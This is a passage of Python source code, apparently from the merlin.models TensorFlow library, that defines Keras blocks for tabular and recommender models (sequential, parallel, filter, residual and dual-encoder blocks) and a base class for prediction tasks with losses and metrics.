**kwargs,
):
"""Create a composition.
Parameters
----------
layers:
A list or tuple of layers to compose.
**kwargs:
Arguments to pass to `Keras` layer initializer, including `name`.
Raises
------
TypeError:
If any of the layers are not instances of keras `Layer`.
"""
if len(layers) == 1 and isinstance(layers[0], (list, tuple)):
layers = layers[0]
self.block_name = block_name
if pre_aggregation:
layers = [TabularBlock(aggregation=pre_aggregation), *layers]
for layer in layers:
if not isinstance(layer, tf.keras.layers.Layer):
raise TypeError(
"Expected all layers to be instances of keras Layer, but saw: '{}'".format(
layer
)
)
super(SequentialBlock, self).__init__(**kwargs)
if getattr(layers[0], "schema", None):
super().set_schema(layers[0].schema)
layers = copy.copy(layers) if copy_layers else layers
if filter:
if not isinstance(filter, Filter):
filter = Filter(filter)
self.layers = [filter, *layers]
else:
self.layers = layers
def compute_output_shape(self, input_shape):
output_shape = input_shape
for layer in self.layers:
output_shape = layer.compute_output_shape(output_shape)
return output_shape
def compute_output_signature(self, input_signature):
output_signature = input_signature
for layer in self.layers:
output_signature = layer.compute_output_signature(output_signature)
return output_signature
def build(self, input_shape=None):
self._maybe_propagate_context(input_shape)
last_layer = None
for layer in self.layers:
try:
layer.build(input_shape)
except TypeError:
t, v, tb = sys.exc_info()
if isinstance(input_shape, dict) and isinstance(last_layer, TabularBlock):
v = TypeError(
f"Couldn't build {layer}, "
f"did you forget to add aggregation to {last_layer}?"
)
six.reraise(t, v, tb)
input_shape = layer.compute_output_shape(input_shape)
last_layer = layer
self.built = True
def set_schema(self, schema=None):
for layer in self.layers:
self._maybe_set_schema(layer, schema)
return super().set_schema(schema)
def _get_name(self):
return self.block_name if self.block_name else f"{self.__class__.__name__}"
@property
def inputs(self):
first = list(self)[0]
if isinstance(first, SequentialBlock):
return first.inputs
if is_input_block(first):
return first
@property
def first(self):
return self.layers[0]
@property
def last(self):
return self.layers[-1]
@property
def filter_features(self) -> List[str]:
if isinstance(self.layers[0], Filter):
return self.layers[0].feature_names
elif isinstance(self.layers[0], SequentialBlock):
return self.layers[0].filter_features
return []
@property
def trainable_weights(self):
if not self.trainable:
return []
weights = {}
for layer in self.layers:
for v in layer.trainable_weights:
weights[id(v)] = v
return list(weights.values())
@property
def non_trainable_weights(self):
weights = {}
for layer in self.layers:
for v in layer.non_trainable_weights:
weights[id(v)] = v
return list(weights.values())
@property
def trainable(self):
return all(layer.trainable for layer in self.layers)
@trainable.setter
def trainable(self, value):
for layer in self.layers:
layer.trainable = value
@property
def losses(self):
values = set()
for layer in self.layers:
values.update(layer.losses)
return list(values)
@property
def regularizers(self):
values = set()
for layer in self.layers:
values.update(layer.regularizers)
return list(values)
def call(self, inputs, training=False, **kwargs):
if getattr(self, "_need_to_call_context", False):
self.context(inputs)
outputs = inputs
for i, layer in enumerate(self.layers):
if i == len(self.layers) - 1:
filtered_kwargs = filter_kwargs(kwargs, layer, filter_positional_or_keyword=False)
else:
filtered_kwargs = filter_kwargs(
dict(training=training), layer, filter_positional_or_keyword=False
)
outputs = layer(outputs, **filtered_kwargs)
return outputs
def compute_loss(self, inputs, targets, **kwargs):
outputs, targets = inputs, targets
for layer in self.layers:
outputs, targets = layer.compute_loss(outputs, targets=targets, **kwargs)
return outputs, targets
def call_targets(self, predictions, targets, training=False, **kwargs):
outputs = targets
for layer in self.layers:
if isinstance(outputs, (list, tuple)) and len(outputs) > 0:
outputs, predictions = outputs
outputs = layer.call_targets(predictions, outputs, training=training, **kwargs)
return outputs
def get_config(self):
config = {}
for i, layer in enumerate(self.layers):
config[i] = tf.keras.utils.serialize_keras_object(layer)
return config
def __getitem__(self, key):
return self.layers[key]
@property
def is_tabular(self):
return getattr(self.layers[-1], "is_tabular", False)
@classmethod
def from_config(cls, config, custom_objects=None):
layers = [
tf.keras.layers.deserialize(conf, custom_objects=custom_objects)
for conf in config.values()
]
return SequentialBlock(layers)
def __rrshift__(self, other):
return right_shift_layer(self, other)
def __rshift__(self, other):
# pylint: disable=arguments-out-of-order
return right_shift_layer(other, self)
tabular_aggregation_registry: Registry = Registry.class_registry("tf.tabular_aggregations")
class TabularAggregation(
SchemaMixin, tf.keras.layers.Layer, RegistryMixin["TabularAggregation"], abc.ABC
):
registry = tabular_aggregation_registry
"""Aggregation of `TabularData` that outputs a single `Tensor`"""
def call(self, inputs: TabularData, **kwargs) -> tf.Tensor:
raise NotImplementedError()
def _expand_non_sequential_features(self, inputs: TabularData) -> TabularData:
inputs_sizes = {k: v.shape for k, v in inputs.items()}
seq_features_shapes, sequence_length = self._get_seq_features_shapes(inputs_sizes)
if len(seq_features_shapes) > 0:
non_seq_features = set(inputs.keys()).difference(set(seq_features_shapes.keys()))
for fname in non_seq_features:
# Including the 2nd dim and repeating for the sequence length
inputs[fname] = tf.tile(tf.expand_dims(inputs[fname], 1), (1, sequence_length, 1))
return inputs
def _get_seq_features_shapes(self, inputs_sizes: Dict[str, tf.TensorShape]):
seq_features_shapes = dict()
for fname, fshape in inputs_sizes.items():
# Saves the shapes of sequential features
if len(fshape) >= 3:
seq_features_shapes[fname] = tuple(fshape[:2])
sequence_length = 0
if len(seq_features_shapes) > 0:
if len(set(seq_features_shapes.values())) > 1:
raise ValueError(
"All sequential features must share the same shape in the first two dims "
"(batch_size, seq_length): {}".format(seq_features_shapes)
)
sequence_length = list(seq_features_shapes.values())[0][1]
return seq_features_shapes, sequence_length
def _check_concat_shapes(self, inputs: TabularData):
input_sizes = {k: v.shape for k, v in inputs.items()}
if len(set([tuple(v[:-1]) for v in input_sizes.values()])) > 1:
raise Exception(
"All features dimensions except the last one must match: {}".format(input_sizes)
)
def _get_agg_output_size(self, input_size, agg_dim, axis=-1):
batch_size = calculate_batch_size_from_input_shapes(input_size)
seq_features_shapes, sequence_length = self._get_seq_features_shapes(input_size)
if len(seq_features_shapes) > 0:
return batch_size, sequence_length, agg_dim
return tf.TensorShape((batch_size, agg_dim))
def get_values(self, inputs: TabularData) -> List[tf.Tensor]:
values = []
for value in inputs.values():
if type(value) is dict:
values.extend(self.get_values(value)) # type: ignore
else:
values.append(value)
return values
TabularAggregationType = Union[str, TabularAggregation]
TABULAR_MODULE_PARAMS_DOCSTRING = """
pre: Union[str, TabularTransformation, List[str], List[TabularTransformation]], optional
Transformations to apply on the inputs when the module is called (so **before** `call`).
post: Union[str, TabularTransformation, List[str], List[TabularTransformation]], optional
Transformations to apply on the inputs after the module is called (so **after** `call`).
aggregation: Union[str, TabularAggregation], optional
Aggregation to apply after processing the `call`-method to output a single Tensor.
Next to providing a class that extends TabularAggregation, it's also possible to provide
the name that the class is registered in the `tabular_aggregation_registry`. Out of the box
this contains: "concat", "stack", "element-wise-sum" &
"element-wise-sum-item-multi".
schema: Optional[DatasetSchema]
DatasetSchema containing the columns used in this block.
name: Optional[str]
Name of the layer.
"""
@docstring_parameter(tabular_module_parameters=TABULAR_MODULE_PARAMS_DOCSTRING)
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class TabularBlock(Block):
"""Layer that's specialized for tabular-data by integrating many often used operations.
Note, when extending this class, typically you want to overwrite the `compute_call_output_shape`
method instead of the normal `compute_output_shape`. This because a Block can contain pre- and
post-processing and the output-shapes are handled automatically in `compute_output_shape`. The
output of `compute_call_output_shape` should be the shape that's outputted by the `call`-method.
Parameters
----------
{tabular_module_parameters}
"""
def __init__(
self,
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
aggregation: Optional[TabularAggregationType] = None,
schema: Optional[Schema] = None,
name: Optional[str] = None,
is_input: bool = False,
**kwargs,
):
super().__init__(name=name, **kwargs)
self.input_size = None
self.set_pre(pre)
self.set_post(post)
self.set_aggregation(aggregation)
self._is_input = is_input
if schema:
self.set_schema(schema)
@property
def is_input(self) -> bool:
return self._is_input
@classmethod
def from_schema(
cls, schema: Schema, tags=None, allow_none=True, **kwargs
) -> Optional["TabularBlock"]:
"""Instantiate a TabularLayer instance from a DatasetSchema.
Parameters
----------
schema
tags
kwargs
Returns
-------
Optional[TabularModule]
"""
schema_copy = copy.copy(schema)
if tags:
schema_copy = schema_copy.select_by_tag(tags)
if not schema_copy.column_names and not allow_none:
raise ValueError(f"No features with tags: {tags} found")
if not schema_copy.column_names:
return None
return cls.from_features(schema_copy.column_names, schema=schema_copy, **kwargs)
@classmethod
@docstring_parameter(tabular_module_parameters=TABULAR_MODULE_PARAMS_DOCSTRING, extra_padding=4)
def from_features(
cls,
features: List[str],
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
aggregation: Optional[TabularAggregationType] = None,
name=None,
**kwargs,
) -> "TabularBlock":
"""
Initializes a TabularLayer instance where the contents of features will be filtered out
Parameters
----------
features: List[str]
A list of feature-names that will be used as the first pre-processing op to filter out
all other features not in this list.
{tabular_module_parameters}
Returns
-------
TabularModule
"""
pre = [Filter(features), pre] if pre else Filter(features) # type: ignore
return cls(pre=pre, post=post, aggregation=aggregation, name=name, **kwargs)
def pre_call(
self, inputs: TabularData, transformations: Optional[BlockType] = None
) -> TabularData:
"""Method that's typically called before the forward method for pre-processing.
Parameters
----------
inputs: TabularData
input-data, typically the output of the forward method.
transformations: TabularTransformationsType, optional
Returns
-------
TabularData
"""
return self._maybe_apply_transformations(
inputs, transformations=transformations or self.pre
)
def call(self, inputs: TabularData, **kwargs) -> TabularData:
return inputs
def post_call(
self,
inputs: TabularData,
transformations: Optional[BlockType] = None,
merge_with: Union["TabularBlock", List["TabularBlock"]] = None,
aggregation: Optional[TabularAggregationType] = None,
) -> TensorOrTabularData:
"""Method that's typically called after the forward method for post-processing.
Parameters
----------
inputs: TabularData
input-data, typically the output of the forward method.
transformations: TabularTransformationType, optional
Transformations to apply on the input data.
merge_with: Union[TabularModule, List[TabularModule]], optional
Other TabularModule's to call and merge the outputs with.
aggregation: TabularAggregationType, optional
Aggregation to aggregate the output to a single Tensor.
Returns
-------
TensorOrTabularData (Tensor when aggregation is set, else TabularData)
"""
_aggregation: Optional[TabularAggregation] = None
if aggregation:
_aggregation = TabularAggregation.parse(aggregation)
_aggregation = _aggregation or getattr(self, "aggregation", None)
outputs = inputs
if merge_with:
if not isinstance(merge_with, list):
merge_with = [merge_with]
for layer_or_tensor in merge_with:
to_add = layer_or_tensor(inputs) if callable(layer_or_tensor) else layer_or_tensor
outputs.update(to_add)
outputs = self._maybe_apply_transformations(
outputs, transformations=transformations or self.post
)
if _aggregation:
schema = getattr(self, "schema", None)
_aggregation.set_schema(schema)
return _aggregation(outputs)
return outputs
def __call__( # type: ignore
self,
inputs: TabularData,
*args,
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
merge_with: Union["TabularBlock", List["TabularBlock"]] = None,
aggregation: Optional[TabularAggregationType] = None,
**kwargs,
) -> TensorOrTabularData:
"""We overwrite the call method in order to be able to do pre- and post-processing.
Parameters
----------
inputs: TabularData
Input TabularData.
pre: TabularTransformationsType, optional
Transformations to apply before calling the forward method. If pre is None, this method
will check if `self.pre` is set.
post: TabularTransformationsType, optional
Transformations to apply after calling the forward method. If post is None, this method
will check if `self.post` is set.
merge_with: Union[TabularModule, List[TabularModule]]
Other TabularModule's to call and merge the outputs with.
aggregation: TabularAggregationType, optional
Aggregation to aggregate the output to a single Tensor.
Returns
-------
TensorOrTabularData (Tensor when aggregation is set, else TabularData)
"""
inputs = self.pre_call(inputs, transformations=pre)
# This will call the `call` method implemented by the super class.
outputs = super().__call__(inputs, *args, **kwargs) # noqa
if isinstance(outputs, dict):
outputs = self.post_call(
outputs, transformations=post, merge_with=merge_with, aggregation=aggregation
)
return outputs
def _maybe_apply_transformations(
self,
inputs: TabularData,
transformations: Optional[BlockType] = None,
) -> TabularData:
"""Apply transformations to the inputs if these are defined.
Parameters
----------
inputs
transformations
Returns
-------
"""
if transformations:
transformations = Block.parse(transformations)
return transformations(inputs)
return inputs
def compute_call_output_shape(self, input_shapes):
return input_shapes
def compute_output_shape(self, input_shapes):
if self.pre:
input_shapes = self.pre.compute_output_shape(input_shapes)
output_shapes = self._check_post_output_size(self.compute_call_output_shape(input_shapes))
return output_shapes
def build(self, input_shapes):
super().build(input_shapes)
output_shapes = input_shapes
if self.pre:
self.pre.build(input_shapes)
output_shapes = self.pre.compute_output_shape(input_shapes)
output_shapes = self.compute_call_output_shape(output_shapes)
if isinstance(output_shapes, dict):
if self.post:
self.post.build(output_shapes)
output_shapes = self.post.compute_output_shape(output_shapes)
if self.aggregation:
schema = getattr(self, "schema", None)
self.aggregation.set_schema(schema)
self.aggregation.build(output_shapes)
def get_config(self):
config = super(TabularBlock, self).get_config()
config = maybe_serialize_keras_objects(self, config, ["pre", "post", "aggregation"])
if self.schema:
config["schema"] = schema_to_tensorflow_metadata_json(self.schema)
return config
@property
def is_tabular(self) -> bool:
return True
@classmethod
def from_config(cls, config):
config = maybe_deserialize_keras_objects(config, ["pre", "post", "aggregation"])
if "schema" in config:
config["schema"] = tensorflow_metadata_json_to_schema(config["schema"])
return super().from_config(config)
def _check_post_output_size(self, input_shapes):
output_shapes = input_shapes
if isinstance(output_shapes, dict):
if self.post:
output_shapes = self.post.compute_output_shape(output_shapes)
if self.aggregation:
schema = getattr(self, "schema", None)
self.aggregation.set_schema(schema)
output_shapes = self.aggregation.compute_output_shape(output_shapes)
return output_shapes
def apply_to_all(self, inputs, columns_to_filter=None):
if columns_to_filter:
inputs = Filter(columns_to_filter)(inputs)
outputs = tf.nest.map_structure(self, inputs)
return outputs
def set_schema(self, schema=None):
self._maybe_set_schema(self.pre, schema)
self._maybe_set_schema(self.post, schema)
self._maybe_set_schema(self.aggregation, schema)
return super().set_schema(schema)
def set_pre(self, value: Optional[BlockType]):
self._pre = Block.parse(value) if value else None
@property
def pre(self) -> Optional[Block]:
"""
Returns
-------
SequentialTabularTransformations, optional
"""
return self._pre
@property
def post(self) -> Optional[Block]:
"""
Returns
-------
SequentialTabularTransformations, optional
"""
return self._post
def set_post(self, value: Optional[BlockType]):
self._post = Block.parse(value) if value else None
@property
def aggregation(self) -> Optional[TabularAggregation]:
"""
Returns
-------
TabularAggregation, optional
"""
return self._aggregation
def set_aggregation(self, value: Optional[Union[str, TabularAggregation]]):
"""
Parameters
----------
value
"""
if value:
self._aggregation: Optional[TabularAggregation] = TabularAggregation.parse(value)
else:
self._aggregation = None
def repr_ignore(self):
return []
def repr_extra(self):
return []
def repr_add(self):
return []
@staticmethod
def calculate_batch_size_from_input_shapes(input_shapes):
return calculate_batch_size_from_input_shapes(input_shapes)
def __rrshift__(self, other):
return right_shift_layer(self, other)
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class Filter(TabularBlock):
"""Transformation that filters out certain features from `TabularData`."
Parameters
----------
to_include: List[str]
List of features to include in the result of calling the module
pop: bool
Boolean indicating whether to pop the features to exclude from the inputs dictionary.
"""
@overload
def __init__(
self,
inputs: Schema,
name=None,
pop=False,
exclude=False,
add_to_context: bool = False,
**kwargs,
):
...
@overload
def __init__(
self,
inputs: Tags,
name=None,
pop=False,
exclude=False,
add_to_context: bool = False,
**kwargs,
):
...
@overload
def __init__(
self,
inputs: Sequence[str],
name=None,
pop=False,
exclude=False,
add_to_context: bool = False,
**kwargs,
):
...
def __init__(
self, inputs, name=None, pop=False, exclude=False, add_to_context: bool = False, **kwargs
):
if isinstance(inputs, Tags):
self.feature_names = inputs
else:
self.feature_names = list(inputs.column_names) if isinstance(inputs, Schema) else inputs
super().__init__(name=name, **kwargs)
self.exclude = exclude
self.pop = pop
self.add_to_context = add_to_context
def set_schema(self, schema=None):
out = super().set_schema(schema)
if isinstance(self.feature_names, Tags):
self.feature_names = self.schema.select_by_tag(self.feature_names).column_names
return out
def call(self, inputs: TabularData, **kwargs) -> TabularData:
"""Filter out features from inputs.
Parameters
----------
inputs: TabularData
Input dictionary containing features to filter.
Returns Filtered TabularData that only contains the feature-names in `self.to_include`.
-------
"""
assert isinstance(inputs, dict), "Inputs needs to be a dict"
outputs = {k: v for k, v in inputs.items() if self.check_feature(k)}
if self.pop:
for key in outputs.keys():
inputs.pop(key)
if self.add_to_context:
self.context.tensors.update(outputs)
return {}
return outputs
def compute_call_output_shape(self, input_shape):
if self.add_to_context:
return {}
outputs = {k: v for k, v in input_shape.items() if self.check_feature(k)}
return outputs
def check_feature(self, feature_name) -> bool:
if self.exclude:
return feature_name not in self.feature_names
return feature_name in self.feature_names
def get_config(self):
config = super().get_config()
config["inputs"] = self.feature_names
config["exclude"] = self.exclude
config["pop"] = self.pop
return config
# @classmethod
# def from_config(cls, config):
# config = maybe_deserialize_keras_objects(config, ["pre", "post", "aggregation"])
# if "schema" in config:
# config["schema"] = Schema().from_json(config["schema"])
#
# return cls(config.pop(""), **config)
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class ParallelBlock(TabularBlock):
"""Merge multiple layers or TabularModule's into a single output of TabularData.
Parameters
----------
blocks_to_merge: Union[TabularModule, Dict[str, TabularBlock]]
TabularBlocks to merge into, this can also be one or multiple dictionaries keyed by the
name the module should have.
{tabular_module_parameters}
"""
def __init__(
self,
*inputs: Union[tf.keras.layers.Layer, Dict[str, tf.keras.layers.Layer]],
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
aggregation: Optional[TabularAggregationType] = None,
schema: Optional[Schema] = None,
name: Optional[str] = None,
strict: bool = False,
**kwargs,
):
super().__init__(
pre=pre, post=post, aggregation=aggregation, schema=schema, name=name, **kwargs
)
self.strict = strict
self.parallel_layers: Union[List[TabularBlock], Dict[str, TabularBlock]]
if all(isinstance(x, dict) for x in inputs):
to_merge: Dict[str, tf.keras.layers.Layer] = reduce(
lambda a, b: dict(a, **b), inputs
) # type: ignore
parsed_to_merge: Dict[str, TabularBlock] = {}
for key, val in to_merge.items():
parsed_to_merge[key] = val
self.parallel_layers = parsed_to_merge
elif all(isinstance(x, tf.keras.layers.Layer) for x in inputs):
parsed: List[TabularBlock] = []
for i, inp in enumerate(inputs):
parsed.append(inp)
self.parallel_layers = parsed
else:
raise ValueError(
"Please provide one or multiple layer's to merge or "
f"dictionaries of layer. got: {inputs}"
)
# Merge schemas if necessary.
if not schema and all(getattr(m, "schema", False) for m in self.parallel_values):
if len(self.parallel_values) == 1:
self.set_schema(self.parallel_values[0].schema)
else:
s = reduce(
lambda a, b: a + b, [m.schema for m in self.parallel_values]
) # type: ignore
self.set_schema(s)
@property
def parallel_values(self) -> List[tf.keras.layers.Layer]:
if isinstance(self.parallel_layers, dict):
return list(self.parallel_layers.values())
return self.parallel_layers
@property
def parallel_dict(self) -> Dict[str, tf.keras.layers.Layer]:
if isinstance(self.parallel_layers, dict):
return self.parallel_layers
return {str(i): m for i, m in enumerate(self.parallel_layers)}
def select_by_name(self, name: str) -> Optional["Block"]:
return self.parallel_dict.get(name)
def __getitem__(self, key) -> "Block":
return self.parallel_dict[key]
def __setitem__(self, key: str, item: "Block"):
self.parallel_dict[key] = item
def add_branch(self, name: str, block: "Block") -> "ParallelBlock":
if isinstance(self.parallel_layers, dict):
self.parallel_layers[name] = block
return self
def apply_to_branch(self, branch_name: str, *block: "Block"):
if isinstance(self.parallel_layers, dict):
self.parallel_layers[branch_name] = self.parallel_layers[branch_name].apply(*block)
def call(self, inputs, **kwargs):
if self.strict:
assert isinstance(inputs, dict), "Inputs needs to be a dict"
if getattr(self, "_need_to_call_context", False):
self.context(inputs)
outputs = {}
if isinstance(inputs, dict) and all(
name in inputs for name in list(self.parallel_dict.keys())
):
for name, block in self.parallel_dict.items():
out = block(inputs[name])
if not isinstance(out, dict):
out = {name: out}
outputs.update(out)
else:
for name, layer in self.parallel_dict.items():
out = layer(inputs)
if not isinstance(out, dict):
out = {name: out}
outputs.update(out)
return outputs
def compute_call_output_shape(self, input_shape):
output_shapes = {}
for name, layer in self.parallel_dict.items():
if isinstance(input_shape, dict) and all(
key in input_shape for key in list(self.parallel_dict.keys())
):
out = layer.compute_output_shape(input_shape[name])
else:
out = layer.compute_output_shape(input_shape)
if isinstance(out, dict):
output_shapes.update(out)
else:
output_shapes[name] = out
return output_shapes
def build(self, input_shape):
if isinstance(input_shape, dict) and all(
name in input_shape for name in list(self.parallel_dict.keys())
):
for key, block in self.parallel_dict.items():
block.build(input_shape[key])
else:
for layer in self.parallel_values:
layer.build(input_shape)
return super().build(input_shape)
def get_config(self):
return maybe_serialize_keras_objects(
self, super(ParallelBlock, self).get_config(), ["parallel_layers"]
)
@classmethod
def parse_config(cls, config, custom_objects=None):
config = maybe_deserialize_keras_objects(config, ["pre", "post", "aggregation"])
if "schema" in config:
config["schema"] = tensorflow_metadata_json_to_schema(config["schema"])
parallel_layers = config.pop("parallel_layers")
inputs = {
name: tf.keras.layers.deserialize(conf, custom_objects=custom_objects)
for name, conf in parallel_layers.items()
}
return inputs, config
@classmethod
def from_config(cls, config, custom_objects=None):
inputs, config = cls.parse_config(config, custom_objects)
return cls(inputs, **config)
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class AsTabular(tf.keras.layers.Layer):
"""Converts a Tensor to TabularData by converting it to a dictionary.
Parameters
----------
output_name: str
Name that should be used as the key in the output dictionary.
name: str
Name of the layer.
"""
def __init__(self, output_name: str, name=None, **kwargs):
super().__init__(name=name, **kwargs)
self.output_name = output_name
def call(self, inputs, **kwargs):
return {self.output_name: inputs}
def compute_output_shape(self, input_shape):
return {self.output_name: input_shape}
def get_config(self):
config = super(AsTabular, self).get_config()
config["output_name"] = self.output_name
return config
@property
def is_tabular(self) -> bool:
return True
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class NoOp(tf.keras.layers.Layer):
def call(self, inputs, **kwargs):
return inputs
def compute_output_shape(self, input_shape):
return input_shape
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class Debug(tf.keras.layers.Layer):
def call(self, inputs, **kwargs):
return inputs
def compute_output_shape(self, input_shape):
return input_shape
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class WithShortcut(ParallelBlock):
def __init__(
self,
block: Union[tf.keras.layers.Layer, Block],
shortcut_filter: Optional[Filter] = None,
aggregation=None,
post: Optional[BlockType] = None,
schema: Optional[Schema] = None,
name: Optional[str] = None,
strict: bool = False,
block_outputs_name: Optional[str] = None,
**kwargs,
):
block_outputs_name = block_outputs_name or block.name
shortcut = shortcut_filter if shortcut_filter else NoOp()
inputs = {block_outputs_name: block, "shortcut": shortcut}
super().__init__(
inputs,
post=post,
aggregation=aggregation,
schema=schema,
name=name,
strict=strict,
**kwargs,
)
@classmethod
def from_config(cls, config, **kwargs):
output = ParallelBlock.from_config(config, **kwargs)
output.__class__ = cls
return output
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class ResidualBlock(WithShortcut):
def __init__(
self,
block: Union[tf.keras.layers.Layer, Block],
activation=None,
post: Optional[BlockType] = None,
schema: Optional[Schema] = None,
name: Optional[str] = None,
strict: bool = False,
**kwargs,
):
from merlin.models.tf.blocks.aggregation import SumResidual
super().__init__(
block,
post=post,
aggregation=SumResidual(activation=activation),
schema=schema,
name=name,
strict=strict,
**kwargs,
)
class DualEncoderBlock(ParallelBlock):
def __init__(
self,
left: Union[TabularBlock, tf.keras.layers.Layer],
right: Union[TabularBlock, tf.keras.layers.Layer],
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
aggregation: Optional[TabularAggregationType] = None,
schema: Optional[Schema] = None,
left_name: str = "left",
right_name: str = "right",
name: Optional[str] = None,
strict: bool = False,
**kwargs,
):
if not getattr(left, "is_tabular", False):
left = SequentialBlock([left, AsTabular(left_name)])
if not getattr(right, "is_tabular", False):
right = SequentialBlock([right, AsTabular(right_name)])
towers = {left_name: left, right_name: right}
super().__init__(
towers,
pre=pre,
post=post,
aggregation=aggregation,
schema=schema,
name=name,
strict=strict,
**kwargs,
)
@classmethod
def from_config(cls, config, **kwargs):
output = ParallelBlock.from_config(config, **kwargs)
output.__class__ = cls
return output
def call_parallel(self, other, aggregation=None, **kwargs):
return ParallelBlock(self, other, aggregation=aggregation, **kwargs)
TabularBlock.__add__ = call_parallel
# TabularBlock.merge = call_parallel
def name_fn(name, inp):
return "/".join([name, inp]) if name else None
MetricOrMetricClass = Union[tf.keras.metrics.Metric, Type[tf.keras.metrics.Metric]]
@dataclass
class EmbeddingWithMetadata:
embeddings: tf.Tensor
metadata: Dict[str, tf.Tensor]
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class PredictionTask(Layer, LossMixin, MetricsMixin, ContextMixin):
"""Base-class for prediction tasks.
Parameters
----------
metrics:
List of Keras metrics to be evaluated.
prediction_metrics:
List of Keras metrics used to summarize the predictions.
label_metrics:
List of Keras metrics used to summarize the labels.
loss_metrics:
List of Keras metrics used to summarize the loss.
name:
Optional task name.
"""
def __init__(
self,
target_name: Optional[str] = None,
task_name: Optional[str] = None,
metrics: Optional[List[MetricOrMetricClass]] = None,
pre: Optional[Block] = None,
task_block: Optional[Layer] = None,
prediction_metrics: Optional[List[tf.keras.metrics.Metric]] = None,
label_metrics: Optional[List[tf.keras.metrics.Metric]] = None,
loss_metrics: Optional[List[tf.keras.metrics.Metric]] = None,
name: Optional[Text] = None,
**kwargs,
) -> None:
super().__init__(name=name, **kwargs)
self.target_name = target_name
self.task_block = task_block
self._task_name = task_name
self.pre = pre
create_metrics = self._create_metrics
self.eval_metrics = create_metrics(metrics) if metrics else []
self.prediction_metrics = create_metrics(prediction_metrics) if prediction_metrics else []
self.label_metrics = create_metrics(label_metrics) if label_metrics else []
self.loss_metrics = create_metrics(loss_metrics) if loss_metrics else []
def pre_call(self, inputs, **kwargs):
x = inputs
if self.task_block:
x = self.task_block(x)
if self.pre:
x = self.pre(inputs, **kwargs)
return x
def pre_loss(self, predictions, targets, **kwargs):
targets = self.pre.call_targets(predictions, targets, **kwargs)
return targets
def __call__(self, *args, **kwargs):
inputs = self.pre_call(*args, **kwargs)
# This will call the `call` method implemented by the super class.
outputs = super().__call__(inputs, **kwargs) # noqa
return outputs
def build_task(self, input_shape, schema: Schema, body: Block, **kwargs):
return super().build(input_shape)
def _create_metrics(self, metrics: List[MetricOrMetricClass]) -> List[tf.keras.metrics.Metric]:
outputs = []
for metric in metrics:
if not isinstance(metric, tf.keras.metrics.Metric):
metric = metric(name=self.child_name(generic_utils.to_snake_case(metric.__name__)))
outputs.append(metric)
return outputs
@property
def task_name(self):
if self._task_name:
return self._task_name
base_name = generic_utils.to_snake_case(self.__class__.__name__)
return name_fn(self.target_name, base_name) if self.target_name else base_name
def child_name(self, name):
return name_fn(self.task_name, name)
@abc.abstractmethod
def _compute_loss(
self, predictions, targets, sample_weight=None, training: bool = False, **kwargs
) -> tf.Tensor:
raise NotImplementedError()
def compute_loss( # type: ignore
self,
predictions,
targets,
training: bool = False,
compute_metrics=True,
sample_weight: Optional[tf.Tensor] = None,
**kwargs,
) -> tf.Tensor:
if isinstance(targets, dict) and self.target_name:
targets = targets[self.target_name]
if isinstance(predictions, dict) and self.target_name and self.task_name in predictions:
predictions = predictions[self.task_name]
if self.pre:
targets = self.pre_loss(predictions, targets, training=training, **kwargs)
if isinstance(targets, tuple):
targets, predictions = targets
if isinstance(targets, tf.Tensor) and len(targets.shape) == len(predictions.shape) - 1:
predictions = tf.squeeze(predictions)
loss = self._compute_loss(
predictions, targets=targets, sample_weight=sample_weight, training=training
)
if compute_metrics:
update_ops = self.calculate_metrics(predictions, targets, forward=False, loss=loss)
update_ops = [x for x in update_ops if x is not None]
with tf.control_dependencies(update_ops):
return tf.identity(loss)
return loss
def repr_add(self):
return [("loss", self.loss)]
def calculate_metrics(self, predictions, targets, sample_weight=None, forward=True, loss=None):
if isinstance(targets, dict) and self.target_name:
targets = targets[self.target_name]
if forward:
predictions = self(predictions)
update_ops = []
for metric in self.eval_metrics:
update_ops.append(
metric.update_state(y_true=targets, y_pred=predictions, sample_weight=sample_weight)
)
for metric in self.prediction_metrics:
update_ops.append(metric.update_state(predictions, sample_weight=sample_weight))
for metric in self.label_metrics:
update_ops.append(metric.update_state(targets, sample_weight=sample_weight))
for metric in self.loss_metrics:
if not loss:
loss = self.loss(y_true=targets, y_pred=predictions, sample_weight=sample_weight)
update_ops.append(metric.update_state(loss, sample_weight=sample_weight))
return update_ops
def metric_results(self, mode: str = None):
return {metric.name: metric.result() for metric in self.metrics}
def metric_result_dict(self, mode=None):
return self.metric_results(mode=mode)
def reset_metrics(self):
for metric in self.metrics:
metric.reset()
@classmethod
def from_config(cls, config):
config = maybe_deserialize_keras_objects(
config,
{
"pre": tf.keras.layers.deserialize,
"metrics": tf.keras.metrics.deserialize,
"prediction_metrics": tf.keras.metrics.deserialize,
"label_metrics": tf.keras.metrics.deserialize,
"loss_metrics": tf.keras.metrics.deserialize,
},
)
return super().from_config(config)
def get_config(self):
config = super().get_config()
config = maybe_serialize_keras_objects(
self,
config,
["metrics", "prediction_metrics", "label_metrics", "loss_metrics", "pre"],
)
# config["summary_type"] = self.sequence_summary.summary_type
if self.target_name:
config["target_name"] = self.target_name
if self._task_name:
config["task_name"] = self._task_name
if "metrics" not in config:
config["metrics"] = []
return config
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class ParallelPredictionBlock(ParallelBlock, LossMixin, MetricsMixin):
"""Multi-task prediction block.
Parameters
----------
prediction_tasks: *PredictionTask
List of tasks to be used for prediction.
task_blocks: Optional[Union[Layer, Dict[str, Layer]]]
Task blocks to be used for prediction.
task_weights : Optional[List[float]]
Weights for each task.
bias_block : Optional[Layer]
Bias block to be used for prediction.
loss_reduction : Callable
Reduction function for loss.
"""
def __init__(
self,
*prediction_tasks: PredictionTask,
task_blocks: Optional[Union[Layer, Dict[str, Layer]]] = None,
task_weights: Optional[List[float]] = None,
bias_block: Optional[Layer] = None,
loss_reduction=tf.reduce_mean,
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
**kwargs,
):
self.loss_reduction = loss_reduction
